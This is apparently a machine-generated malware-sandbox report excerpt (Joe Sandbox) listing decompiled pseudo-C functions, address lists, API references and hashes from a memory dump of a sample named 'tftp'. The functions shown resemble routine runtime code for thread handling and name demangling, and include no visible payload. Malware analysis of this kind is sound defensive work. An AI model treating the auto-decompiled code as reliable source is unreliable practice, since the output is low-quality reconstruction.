					 *((intOrPtr*)(_t147 - 0x34))();
					_t88 = 0 |  *(_t147 - 0x24) == 0x00000000;
				}
				return _t88;
				goto L25;
			}

0x0040afc0
0x0040afc3
0x0040afc9
0x0040afce
0x0040afd4
0x0040afde
0x0040afe4
0x0040afee
0x0040aff8
0x0040affd
0x0040b006
0x0040b019
0x0040b01f
0x0040b029
0x0040b033
0x0040b042
0x0040b052
0x0040b057
0x0040b05d
0x0040b05f
0x0040b066
0x0040b06c
0x0040b072
0x0040b125
0x0040b12a
0x0040b1f0
0x0040b1f7
0x0040b200
0x0040b20e
0x0040b214
0x0040b228
0x0040b22a
0x0040b24b
0x0040b24b
0x0040b251
0x0040b257
0x00000000
0x00000000
0x0040b25d
0x0040b261
0x0040b267
0x0040b249
0x00000000
0x0040b274
0x0040b274
0x00000000
0x0040b274
0x00000000
0x0040b267
0x0040b22c
0x0040b232
0x0040b232
0x0040b22a
0x00000000
0x0040b200
0x0040b078
0x0040b078
0x0040b1cb
0x0040b1d3
0x0040b087
0x0040b08b
0x0040b08e
0x0040b094
0x0040b0a0
0x0040b0a3
0x0040b0b9
0x0040b280
0x0040b285
0x0040b28b
0x0040b298
0x0040b298
0x0040b0c8
0x0040b0cf
0x0040b0d4
0x0040b0da
0x0040b0dd
0x0040b0e3
0x0040b0e8
0x0040b0ee
0x0040b0f0
0x0040b0f6
0x0040b0f6
0x0040b078
0x0040b130
0x0040b130
0x0040b134
0x0040b140
0x0040b14b
0x0040b152
0x0040b156
0x0040b15d
0x0040b166
0x0040b16d
0x0040b174
0x0040b17b
0x0040b180
0x0040b187
0x0040b18c
0x0040b192
0x0040b195
0x0040b19d
0x0040b1a1
0x0040b1a5
0x0040b1af
0x0040b1af
0x0040b1b9
0x00000000

APIs

strlen.MSVCRT ref: 0040AFC9
strlen.MSVCRT ref: 0040B0A9
strlen.MSVCRT ref: 0040B0E3

Strings

Z__, xrefs: 0040B1B2
_, xrefs: 0040B087
Z, xrefs: 0040B096

Memory Dump Source

Source File: 00000005.00000002.220019214.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.220009208.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.220049096.0000000000414000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.220056022.0000000000415000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.220075442.000000000041E000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_tftp.jbxd

Similarity

API ID: strlen
String ID: Z$Z__$_
API String ID: 39653677-182788727
Opcode ID: be141b65b5c2b5d2aa1d72df1ace80f8bef83fa80be9c5c6e32a6a55258b7800
Instruction ID: 0090b39de628edc6ae5d0019416bffb4f81be88bbfd81ed7da3e73c706bffbfc
Opcode Fuzzy Hash: be141b65b5c2b5d2aa1d72df1ace80f8bef83fa80be9c5c6e32a6a55258b7800
Instruction Fuzzy Hash: 15510971D052188BDB20DF69C8943DEBBF1AF49304F0485AED858BB391DB795A888F85

Uniqueness

Uniqueness Score: -1.00%

Function 0040F0CC, Relevance: 9.1, APIs: 6, Instructions: 83
COMMON

Download Yara Rule

C-Code - Quality: 39%

			E0040F0CC(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __ebp, void* __eflags, intOrPtr _a4) {
				intOrPtr _v24;
				void* _t29;
				intOrPtr* _t32;
				void* _t34;
				signed int _t35;
				intOrPtr* _t37;
				void* _t39;
				intOrPtr _t42;
				intOrPtr* _t45;
				intOrPtr _t49;
				void* _t54;
				void* _t56;
				void* _t59;
				void* _t61;
				intOrPtr _t64;
				intOrPtr _t66;
				void* _t69;
				intOrPtr* _t70;

				_t62 = __edi;
				_t61 = __edx;
				_t59 = __ecx;
				_push(__esi);
				_push(__ebx);
				_t70 = _t69 - 0x14;
				_t64 = _a4;
				_t29 = E0040DFE0(__ebx, __edx, __edi, _t64);
				_t54 = _t29;
				 *((intOrPtr*)(_t29 + 4)) = _t64;
				 *_t70 =  *((intOrPtr*)(_t29 + 0xbc));
				E0040E99C(_t59, __edx);
				if(( *(_t54 + 0x20) & 0x00000030) != 0) {
					_t37 =  *0x41daf8;
					if(_t37 == 0) {
						_t37 = E0040D0A8();
						 *0x41daf8 = _t37;
					}
					 *_t70 =  *_t37;
					_t39 = TlsGetValue(??);
					_push(_t61);
					_t56 = _t39;
					if(_t39 == 0) {
						L7:
						_a4 = _t64;
						goto L26;
					} else {
						if( *((intOrPtr*)(_t39 + 0x14)) == 0) {
							 *_t56 = 0xdeadbeef;
							_t42 =  *((intOrPtr*)(_t56 + 0x18));
							if(_t42 != 0) {
								 *_t70 = _t42;
								_push(CloseHandle(??));
							}
							 *((intOrPtr*)(_t56 + 0x18)) = 0;
							_t66 =  *((intOrPtr*)(_t56 + 4));
							L9:
							E0040D3AC(_t56, _t61);
							_t45 =  *0x41daf8;
							if(_t45 == 0) {
								_t45 = E0040D0A8();
								 *0x41daf8 = _t45;
							}
							_v24 = 0;
							 *_t70 =  *_t45;
							TlsSetValue(??, ??);
							_a4 = _t66;
							L26:
							return __imp___endthreadex();
						}
						_t66 =  *((intOrPtr*)(_t56 + 4));
						 *((intOrPtr*)(_t56 + 0x70)) = 1;
						_t49 =  *((intOrPtr*)(_t56 + 0x18));
						if(_t49 != 0) {
							 *_t70 = _t49;
							_push(CloseHandle(??));
						}
						 *((intOrPtr*)(_t56 + 0x18)) = 0;
						if(( *(_t56 + 0x24) & 0x00000004) != 0) {
							 *_t56 = 0xdeadbeef;
							 *_t70 =  *((intOrPtr*)(_t56 + 0x14));
							_push(CloseHandle(??));
							 *((intOrPtr*)(_t56 + 0x14)) = 0;
							goto L9;
						} else {
							goto L7;
						}
					}
				}
				_v24 = 1;
				_t55 = _t54 + 0x78;
				 *_t70 = _t54 + 0x78;
				L004134A0();
				_t32 =  *0x41db04;
				if(_t32 == 0) {
					_t32 = E0040D03C();
					 *0x41db04 = _t32;
				}
				if( *_t32 != 0) {
					_t34 = E0040DFE0(_t55, _t61, _t62, _t64);
					if(_t34 == 0 ||  *((intOrPtr*)(_t34 + 0x10)) > 0 || ( *(_t34 + 0x20) & 0x00000003) == 0) {
						goto L19;
					} else {
						_t35 =  *(_t34 + 0x24) & 0x00000001;
					}
				} else {
					L19:
					_t35 = 0;
				}
				return _t35;
			}

0x0040f0cc
0x0040f0cc
0x0040f0cc
0x0040f0cc
0x0040f0cd
0x0040f0ce
0x0040f0d1
0x0040f0d5
0x0040f0da
0x0040f0dc
0x0040f0e5
0x0040f0e8
0x0040f0f1
0x0040f0f7
0x0040f0fe
0x0040f1c8
0x0040f1cd
0x0040f1cd
0x0040f106
0x0040f109
0x0040f10e
0x0040f10f
0x0040f113
0x0040f147
0x0040f147
0x00000000
0x0040f115
0x0040f11a
0x0040f1a4
0x0040f1aa
0x0040f1af
0x0040f1b1
0x0040f1b9
0x0040f1b9
0x0040f1ba
0x0040f1c1
0x0040f171
0x0040f173
0x0040f178
0x0040f17f
0x0040f1d8
0x0040f1dd
0x0040f1dd
0x0040f181
0x0040f18b
0x0040f18e
0x0040f196
0x00413498
0x00413498
0x00413498
0x0040f120
0x0040f123
0x0040f12a
0x0040f12f
0x0040f131
0x0040f139
0x0040f139
0x0040f13a
0x0040f145
0x0040f158
0x0040f161
0x0040f169
0x0040f16a
0x00000000
0x00000000
0x00000000
0x00000000
0x0040f145
0x0040f113
0x0040f1e4
0x0040f1ec
0x0040f1ef
0x0040f1f2
0x0040f1fb
0x0040f202
0x0040f230
0x0040f235
0x0040f235
0x0040f208
0x0040f210
0x0040f217
0x00000000
0x0040f226
0x0040f229
0x0040f229
0x0040f20a
0x0040f20a
0x0040f20a
0x0040f20a
0x0040f20f

APIs

Part of subcall function 0040DFE0: TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040EF28), ref: 0040E022

TlsGetValue.KERNEL32(?,?,0000001C,0040F2CF,?,?,?,?,?,00000000,0040F3D0), ref: 0040F109
CloseHandle.KERNEL32(?,?,?,0000001C,0040F2CF,?,?,?,?,?,00000000,0040F3D0), ref: 0040F134
longjmp.MSVCRT ref: 0040F1F2

Memory Dump Source

Source File: 00000005.00000002.220019214.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.220009208.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.220049096.0000000000414000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.220056022.0000000000415000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.220075442.000000000041E000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_tftp.jbxd

Similarity

API ID: Value$CloseHandlelongjmp
String ID:
API String ID: 1567652279-0
Opcode ID: 99f947f75efb07a88393c56ef80dc2b2ef007e1e13bdc60e1c9e6e19322f5428
Instruction ID: a3bb46c8a15a2f9f7e0f80cd4fdf5906272b92528aebb9e4ed21897be3c57375
Opcode Fuzzy Hash: 99f947f75efb07a88393c56ef80dc2b2ef007e1e13bdc60e1c9e6e19322f5428
Instruction Fuzzy Hash: 5C311CB0A04201CBDB10EF29C88575A7BE4AF05348F4544BEE844AF392E77CD944CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00412B38, Relevance: 9.1, APIs: 6, Instructions: 57COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,00000000,0041311B), ref: 00412B4E
InterlockedDecrement.KERNEL32(00000000), ref: 00412B5B
LeaveCriticalSection.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,00000000,0041311B), ref: 00412B6A
EnterCriticalSection.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,?,?,00000000,0041311B), ref: 00412B99
LeaveCriticalSection.KERNEL32(?,00000001,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00000000,0041311B), ref: 00412BA6

Memory Dump Source

Source File: 00000005.00000002.220019214.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.220009208.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.220049096.0000000000414000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.220056022.0000000000415000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.220075442.000000000041E000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_tftp.jbxd

Similarity

API ID: CriticalSection$EnterLeave$DecrementInterlocked
String ID:
API String ID: 1781445796-0
Opcode ID: eef865afbfe17883c99942727d3244db5e9fb0f24953b8eae7aa55dcecdc74a9
Instruction ID: 222c0ac2eaa3536a36a5390dd564d0ac3d81845117c53ec508fb13d21d41b5be
Opcode Fuzzy Hash: eef865afbfe17883c99942727d3244db5e9fb0f24953b8eae7aa55dcecdc74a9
Instruction Fuzzy Hash: 90011E716087049BC304BF6A998149EFBE8EF89355F05082EF588D3301DA39E9818B5A

Uniqueness

Uniqueness Score: -1.00%

Function 0040FDF8, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 137
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 41%

			E0040FDF8(void* __edx) {
				void* __edi;
				void* __ebp;
				signed int _t24;
				void* _t26;
				signed int _t27;
				signed int _t30;
				int _t31;
				void* _t32;
				signed int _t33;
				signed int _t38;
				signed int _t45;
				long _t52;
				signed int _t53;
				signed int _t57;
				void* _t60;
				signed int _t63;
				void* _t73;
				void* _t76;
				void* _t77;
				void* _t78;
				signed int* _t79;
				signed int* _t80;

				_t60 = _t78 + 0x20;
				memcpy(_t60, 0x41432c, 4 << 2);
				_t79 = _t78 + 0xc;
				_t24 =  *0x41dae0;
				if(_t24 == 0) {
					_t24 = E0040D1CC();
					 *0x41dae0 = _t24;
				}
				 *_t79 = _t24;
				E00410AC0();
				_t67 = _t79[0x14];
				 *_t79 = _t67;
				_t26 = E0040DBFC(_t67);
				_t77 = _t26;
				if(_t26 == 0) {
					L4:
					_t27 =  *0x41dae0;
					if(_t27 == 0) {
						_t27 = E0040D1CC();
						 *0x41dae0 = _t27;
					}
					 *_t79 = _t27;
					E00410634();
					return 3;
				}
				_t30 =  *(_t26 + 0x14);
				if(_t30 == 0) {
					goto L4;
				}
				_t63 =  &(_t79[7]);
				_t79[1] = _t63;
				 *_t79 = _t30;
				_t31 = GetHandleInformation(??, ??);
				_t79 = _t79 - 8;
				if(_t31 == 0) {
					goto L4;
				}
				__eflags =  *(_t77 + 0x24) & 0x00000004;
				if(__eflags == 0) {
					_t32 = E0040EF20(__eflags);
					__eflags = _t79[0x14] - _t32;
					if(_t79[0x14] == _t32) {
						_t33 =  *0x41dae0;
						__eflags = _t33;
						if(_t33 == 0) {
							_t33 = E0040D1CC();
							 *0x41dae0 = _t33;
						}
						 *_t79 = _t33;
						E00410634();
						return 0x24;
					}
					__eflags =  *(_t77 + 0x70);
					if( *(_t77 + 0x70) != 0) {
						L20:
						 *_t79 =  *(_t77 + 0x14);
						CloseHandle(??);
						_push(_t63);
						_t38 =  *(_t77 + 0x18);
						__eflags = _t38;
						if(_t38 != 0) {
							 *_t79 = _t38;
							CloseHandle(??);
							_push(_t67);
						}
						 *(_t77 + 0x18) = 0;
						__eflags = _t79[0x15];
						if(_t79[0x15] != 0) {
							_t67 = _t79[0x15];
							 *(_t79[0x15]) =  *((intOrPtr*)(_t77 + 4));
						}
						_t20 = _t77 + 0x1c; // 0x1c
						 *_t79 = _t20;
						E00410BB4(_t63);
						_t21 = _t77 + 0x34; // 0x34
						_t76 = _t60;
						memcpy(_t21, _t76, 4 << 2);
						_t80 =  &(_t79[3]);
						_t73 = _t76 + 8;
						E0040D3AC(_t77, _t67);
						_t45 =  *0x41dae0;
						__eflags = _t45;
						if(_t45 == 0) {
							_t45 = E0040D1CC();
							 *0x41dae0 = _t45;
						}
						 *_t80 = _t45;
						E00410634();
						E0040F344(_t67, _t73, __eflags);
						return 0;
					}
					_t79[1] = 0;
					 *_t79 =  *(_t77 + 0x14);
					_t52 = WaitForSingleObject(??, ??);
					_t79 = _t79 - 8;
					__eflags = _t52;
					if(_t52 == 0) {
						goto L20;
					}
					_t53 =  *0x41dae0;
					__eflags = _t53;
					if(_t53 == 0) {
						_t53 = E0040D1CC();
						 *0x41dae0 = _t53;
					}
					 *_t79 = _t53;
					E00410634();
					E0040F344(_t67, 0x414334, __eflags);
					return 0x10;
				}
				_t57 =  *0x41dae0;
				__eflags = _t57;
				if(_t57 == 0) {
					_t57 = E0040D1CC();
					 *0x41dae0 = _t57;
				}
				 *_t79 = _t57;
				E00410634();
				return 0x16;
			}

0x0040fdff
0x0040fe0f
0x0040fe0f
0x0040fe11
0x0040fe18
0x0040fea8
0x0040fead
0x0040fead
0x0040fe1e
0x0040fe21
0x0040fe26
0x0040fe2a
0x0040fe2d
0x0040fe32
0x0040fe36
0x0040fe56
0x0040fe56
0x0040fe5d
0x0040fe9c
0x0040fea1
0x0040fea1
0x0040fe5f
0x0040fe62
0x00000000
0x0040fe67
0x0040fe38
0x0040fe3d
0x00000000
0x00000000
0x0040fe3f
0x0040fe43
0x0040fe47
0x0040fe4a
0x0040fe4f
0x0040fe54
0x00000000
0x00000000
0x0040fe74
0x0040fe78
0x0040feb8
0x0040febd
0x0040fec1
0x0040ff17
0x0040ff1c
0x0040ff1e
0x0040ffa5
0x0040ffaa
0x0040ffaa
0x0040ff24
0x0040ff27
0x00000000
0x0040ff2c
0x0040fec6
0x0040fec8
0x0040ff36
0x0040ff39
0x0040ff3c
0x0040ff41
0x0040ff42
0x0040ff45
0x0040ff47
0x0040ff49
0x0040ff4c
0x0040ff51
0x0040ff51
0x0040ff52
0x0040ff5d
0x0040ff5f
0x0040ff64
0x0040ff68
0x0040ff68
0x0040ff6a
0x0040ff6d
0x0040ff70
0x0040ff75
0x0040ff7d
0x0040ff7f
0x0040ff7f
0x0040ff7f
0x0040ff83
0x0040ff88
0x0040ff8d
0x0040ff8f
0x0040ffb4
0x0040ffb9
0x0040ffb9
0x0040ff91
0x0040ff94
0x0040ff99
0x00000000
0x0040ff9e
0x0040feca
0x0040fed5
0x0040fed8
0x0040fedd
0x0040fee0
0x0040fee2
0x00000000
0x00000000
0x0040fee4
0x0040fee9
0x0040feeb
0x0040ffc0
0x0040ffc5
0x0040ffc5
0x0040fef1
0x0040fef4
0x0040fef9
0x00000000
0x0040fefe
0x0040fe7a
0x0040fe7f
0x0040fe81
0x0040ff08
0x0040ff0d
0x0040ff0d
0x0040fe87
0x0040fe8a
0x0040fe9b

APIs

GetHandleInformation.KERNEL32 ref: 0040FE4A
WaitForSingleObject.KERNEL32 ref: 0040FED8

Strings

,CA, xrefs: 0040FE03

Memory Dump Source

Source File: 00000005.00000002.220019214.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.220009208.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.220049096.0000000000414000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.220056022.0000000000415000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.220075442.000000000041E000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_tftp.jbxd

Similarity

API ID: HandleInformationObjectSingleWait
String ID: ,CA
API String ID: 77340887-345574230
Opcode ID: 46ae03abf3ec734ab7439960adf75ef7909151aba191d5757f752d0ff49cceb3
Instruction ID: fbee788a7f53eec97342e672903e07b26f6986017fea098bb0f56319334d4c7c
Opcode Fuzzy Hash: 46ae03abf3ec734ab7439960adf75ef7909151aba191d5757f752d0ff49cceb3
Instruction Fuzzy Hash: CA41FCB1A082068BCB20EF75D54165A77E4AF45784F00483FB845EBB91EB3CD949C7AE

Uniqueness

Uniqueness Score: -1.00%

Function 0040FCFC, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 85
COMMON

Download Yara Rule

C-Code - Quality: 49%

			E0040FCFC(void* __eflags) {
				void* __edi;
				void* __ebp;
				void* _t24;
				intOrPtr _t26;
				int _t27;
				signed int _t35;
				void* _t47;
				void* _t62;
				intOrPtr* _t63;
				intOrPtr* _t64;
				signed int* _t65;

				 *_t63 =  *((intOrPtr*)(_t63 + 0x50));
				_t62 = E0040DBFC( *((intOrPtr*)(_t63 + 0x50)));
				_t47 = _t63 + 0x20;
				_t24 = memcpy(_t47, 0x41432c, 4 << 2);
				_t64 = _t63 + 0xc;
				if(_t24 == 0) {
					L3:
					return 3;
				}
				_t26 =  *((intOrPtr*)(_t24 + 0x14));
				if(_t26 == 0) {
					goto L3;
				}
				_t53 = _t64 + 0x1c;
				 *(_t64 + 4) = _t64 + 0x1c;
				 *_t64 = _t26;
				_t27 = GetHandleInformation(??, ??);
				_t65 = _t64 - 8;
				if(_t27 == 0) {
					goto L3;
				}
				__eflags =  *(_t62 + 0x24) & 0x00000004;
				if(__eflags == 0) {
					__eflags = _t65[0x14] - E0040EF20(__eflags);
					if(__eflags != 0) {
						E0040F344(_t53, 0x414334, __eflags);
						__eflags =  *(_t62 + 0x70);
						if( *(_t62 + 0x70) == 0) {
							_t65[1] = 0xffffffff;
							 *_t65 =  *(_t62 + 0x14);
							WaitForSingleObject(??, ??);
							_t65 = _t65 - 8;
						}
						 *_t65 =  *(_t62 + 0x14);
						_push(CloseHandle(??));
						_t35 =  *(_t62 + 0x18);
						__eflags = _t35;
						if(_t35 != 0) {
							 *_t65 = _t35;
							_push(CloseHandle(??));
						}
						 *(_t62 + 0x18) = 0;
						__eflags = _t65[0x15];
						if(_t65[0x15] != 0) {
							_t53 = _t65[0x15];
							 *(_t65[0x15]) =  *((intOrPtr*)(_t62 + 4));
						}
						_t18 = _t62 + 0x1c; // 0x1c
						 *_t65 = _t18;
						E00410BB4(0);
						_t19 = _t62 + 0x34; // 0x34
						memcpy(_t19, _t47, 4 << 2);
						E0040D3AC(_t62, _t53);
						return 0;
					}
					return 0x24;
				}
				return 0x16;
			}

0x0040fd07
0x0040fd0f
0x0040fd11
0x0040fd21
0x0040fd21
0x0040fd25
0x0040fd45
0x00000000
0x0040fd45
0x0040fd27
0x0040fd2c
0x00000000
0x00000000
0x0040fd2e
0x0040fd32
0x0040fd36
0x0040fd39
0x0040fd3e
0x0040fd43
0x00000000
0x00000000
0x0040fd54
0x0040fd58
0x0040fd6d
0x0040fd71
0x0040fd7a
0x0040fd82
0x0040fd84
0x0040fddf
0x0040fdea
0x0040fded
0x0040fdf2
0x0040fdf2
0x0040fd89
0x0040fd91
0x0040fd92
0x0040fd95
0x0040fd97
0x0040fd99
0x0040fda1
0x0040fda1
0x0040fda2
0x0040fdad
0x0040fdaf
0x0040fdb4
0x0040fdb8
0x0040fdb8
0x0040fdba
0x0040fdbd
0x0040fdc0
0x0040fdc5
0x0040fdcf
0x0040fdd3
0x00000000
0x0040fdd8
0x00000000
0x0040fd73
0x0040fd66

APIs

GetHandleInformation.KERNEL32 ref: 0040FD39

Strings

,CA, xrefs: 0040FD15

Memory Dump Source

Source File: 00000005.00000002.220019214.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.220009208.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.220049096.0000000000414000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.220056022.0000000000415000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.220075442.000000000041E000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_tftp.jbxd

Similarity

API ID: HandleInformation
String ID: ,CA
API String ID: 1064748128-345574230
Opcode ID: 02c6cf3b2ee6e2a33d362b744b499404e1795102ee40c9db45b70f6cf35206ba
Instruction ID: bde4affd196b68f0861cbd273aa441e5e0f93eac4900637c36a9d57cc495a132
Opcode Fuzzy Hash: 02c6cf3b2ee6e2a33d362b744b499404e1795102ee40c9db45b70f6cf35206ba
Instruction Fuzzy Hash: A6213CB16042098BCB20EE79D48169BB7E4AF84355F00493EFC85DB780E73DE949D75A

Uniqueness

Uniqueness Score: -1.00%

Function 0040A220, Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 246
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E0040A220(signed char __eax, signed char* __ecx, signed char* __edx) {
				signed char _t104;
				void* _t107;
				void* _t110;
				signed char _t113;
				intOrPtr _t117;
				void* _t120;
				signed char _t121;
				int _t125;
				signed char _t126;
				signed char* _t137;
				char* _t138;
				signed char* _t139;
				char* _t140;
				signed int _t141;
				signed char _t149;
				signed char _t151;
				signed int _t152;
				signed char _t153;
				signed char _t159;
				signed int _t161;
				signed int _t162;
				signed char _t163;
				signed char* _t167;
				signed char* _t168;
				signed char* _t169;
				signed char* _t170;
				intOrPtr* _t172;
				signed char* _t173;
				void* _t174;
				signed char** _t175;

				_t104 = __eax;
				_t137 = __ecx;
				_t175 = _t174 - 0x4c;
				_t175[5] = __edx;
				_t170 = _t175[0x18];
				if(__ecx == 0) {
					L12:
					return _t104;
				} else {
					_t169 = __eax;
					_t104 =  *(__eax + 0x118);
					if(_t104 == 0) {
						do {
							if(_t137[8] != 0) {
								L11:
								_t137 =  *_t137;
								if(_t137 != 0) {
									goto L3;
								} else {
									goto L12;
								}
							} else {
								_t143 = _t137[4];
								_t104 =  *(_t137[4]);
								if(_t170 != 0 || _t104 - 0x1c > 4) {
									_t137[8] = 1;
									_t167 = _t169[0x110];
									_t169[0x110] = _t137[0xc];
									if(_t104 == 0x29) {
										 *_t175 =  *_t137;
										_t107 = E0040A820(_t169, _t143 + 8, _t175[5]);
										_t169[0x110] = _t167;
										return _t107;
									} else {
										if(_t104 == 0x2a) {
											 *_t175 =  *_t137;
											_t110 = E0040A5A0(_t169, _t143 + 4, _t175[5]);
											_t169[0x110] = _t167;
											return _t110;
										} else {
											if(_t104 == 2) {
												_t169[0x114] = 0;
												E00409A90(_t169,  *((intOrPtr*)(_t143 + 4)), _t175[5]);
												_t113 = _t169[0x100];
												if((_t175[5] & 0x00000004) != 0) {
													if(_t113 == 0xff) {
														_t169[0xff] = 0;
														_t175[1] = 0xff;
														 *_t175 = _t169;
														_t175[2] = _t169[0x10c];
														_t169[0x108]();
														_t159 = 1;
														_t113 = 0;
														_t169[0x120] = _t169[0x120] + 1;
													} else {
														_t159 = _t113 + 1;
													}
													_t169[0x100] = _t159;
													_t169[_t113] = 0x2e;
													_t169[0x104] = 0x2e;
												} else {
													_t173 = 0x415a04;
													_t175[6] = _t137;
													while(1) {
														_t141 =  *_t173 & 0x000000ff;
														if(_t113 != 0xff) {
															_t153 = _t113 + 1;
														} else {
															_t169[0xff] = 0;
															_t175[1] = 0xff;
															 *_t175 = _t169;
															_t175[2] = _t169[0x10c];
															_t169[0x108]();
															_t153 = 1;
															_t113 = 0;
															_t169[0x120] = _t169[0x120] + 1;
														}
														_t173 =  &(_t173[1]);
														_t169[0x100] = _t153;
														_t169[_t113] = _t141;
														_t169[0x104] = _t141;
														if(_t173 == 0x415a06) {
															break;
														}
														_t113 = _t153;
													}
													_t137 = _t175[6];
												}
												_t172 =  *((intOrPtr*)(_t137[4] + 8));
												_t117 =  *_t172;
												if(_t117 == 0x45) {
													_t121 = _t169[0x100];
													_t138 = "{default arg#";
													while(1) {
														_t161 =  *_t138 & 0x000000ff;
														if(_t121 != 0xff) {
															_t149 = _t121 + 1;
														} else {
															_t169[0xff] = 0;
															_t175[6] = _t161;
															_t175[1] = 0xff;
															_t175[2] = _t169[0x10c];
															 *_t175 = _t169;
															_t169[0x108]();
															_t149 = 1;
															_t121 = 0;
															_t169[0x120] = _t169[0x120] + 1;
															_t161 = _t175[6];
														}
														_t138 =  &(_t138[1]);
														_t169[0x100] = _t149;
														_t169[_t121] = _t161;
														_t169[0x104] = _t161;
														if(_t138 == 0x415a14) {
															break;
														}
														_t121 = _t149;
													}
													_t139 =  &(_t175[9]);
													_t175[1] = "%ld";
													 *_t175 = _t139;
													_t175[2] =  *((intOrPtr*)(_t172 + 8)) + 1;
													sprintf(??, ??);
													 *_t175 = _t139;
													_t125 = strlen(??);
													if(_t125 == 0) {
														_t126 = _t169[0x100];
													} else {
														_t163 = _t169[0x100];
														_t175[6] = _t167;
														_t168 =  &(_t139[_t125]);
														while(1) {
															_t152 =  *_t139 & 0x000000ff;
															if(_t163 != 0xff) {
																_t126 = _t163 + 1;
															} else {
																_t169[0xff] = 0;
																_t175[7] = _t152;
																_t175[1] = 0xff;
																_t175[2] = _t169[0x10c];
																 *_t175 = _t169;
																_t169[0x108]();
																_t126 = 1;
																_t163 = 0;
																_t169[0x120] = _t169[0x120] + 1;
																_t152 = _t175[7];
															}
															_t139 =  &(_t139[1]);
															_t169[0x100] = _t126;
															_t169[_t163] = _t152;
															_t169[0x104] = _t152;
															if(_t139 == _t168) {
																break;
															}
															_t163 = _t126;
														}
														_t167 = _t175[6];
													}
													_t140 = "}::";
													while(1) {
														_t162 =  *_t140 & 0x000000ff;
														if(_t126 != 0xff) {
															_t151 = _t126 + 1;
														} else {
															_t169[0xff] = 0;
															_t175[6] = _t162;
															_t175[1] = 0xff;
															_t175[2] = _t169[0x10c];
															 *_t175 = _t169;
															_t169[0x108]();
															_t151 = 1;
															_t126 = 0;
															_t169[0x120] = _t169[0x120] + 1;
															_t162 = _t175[6];
														}
														_t140 =  &(_t140[1]);
														_t169[0x100] = _t151;
														_t169[_t126] = _t162;
														_t169[0x104] = _t162;
														if(_t140 == 0x415a1c) {
															L28:
															_t172 =  *((intOrPtr*)(_t172 + 4));
															_t117 =  *_t172;
															goto L29;
														} else {
															_t126 = _t151;
															continue;
														}
														L30:
														_t120 = E00409A90(_t169, _t172, _t175[5]);
														_t169[0x110] = _t167;
														return _t120;
														goto L53;
													}
												}
												L29:
												if(_t117 - 0x1c <= 4) {
													goto L28;
												}
												goto L30;
											} else {
												_t104 = E00409AB0(_t169, _t143, _t175[5]);
												_t169[0x110] = _t167;
												goto L11;
											}
										}
									}
								} else {
									goto L11;
								}
							}
							goto L53;
							L3:
							_t104 = _t169[0x118];
						} while (_t104 == 0);
					} else {
					}
					goto L12;
				}
				L53:
			}

0x0040a220
0x0040a224
0x0040a226
0x0040a22b
0x0040a22f
0x0040a233
0x0040a2a1
0x0040a2a8
0x0040a235
0x0040a235
0x0040a237
0x0040a23f
0x0040a24d
0x0040a252
0x0040a29b
0x0040a29b
0x0040a29f
0x00000000
0x00000000
0x00000000
0x00000000
0x0040a254
0x0040a254
0x0040a259
0x0040a25b
0x0040a26b
0x0040a272
0x0040a278
0x0040a27e
0x0040a2b2
0x0040a2b7
0x0040a2bc
0x0040a2c9
0x0040a280
0x0040a283
0x0040a2d3
0x0040a2d8
0x0040a2dd
0x0040a2ea
0x0040a285
0x0040a288
0x0040a2f3
0x0040a304
0x0040a309
0x0040a31a
0x0040a388
0x0040a3e3
0x0040a3ea
0x0040a3f2
0x0040a3f5
0x0040a3f9
0x0040a3ff
0x0040a404
0x0040a406
0x0040a38a
0x0040a38a
0x0040a38a
0x0040a38d
0x0040a393
0x0040a397
0x0040a31c
0x0040a31c
0x0040a321
0x0040a346
0x0040a34b
0x0040a34f
0x0040a327
0x0040a351
0x0040a357
0x0040a35e
0x0040a366
0x0040a369
0x0040a36d
0x0040a373
0x0040a378
0x0040a37a
0x0040a37a
0x0040a32a
0x0040a333
0x0040a339
0x0040a33c
0x0040a342
0x00000000
0x00000000
0x0040a344
0x0040a344
0x0040a3a0
0x0040a3a0
0x0040a3a7
0x0040a3aa
0x0040a3b0
0x0040a417
0x0040a41d
0x0040a440
0x0040a445
0x0040a448
0x0040a421
0x0040a44a
0x0040a450
0x0040a457
0x0040a45b
0x0040a463
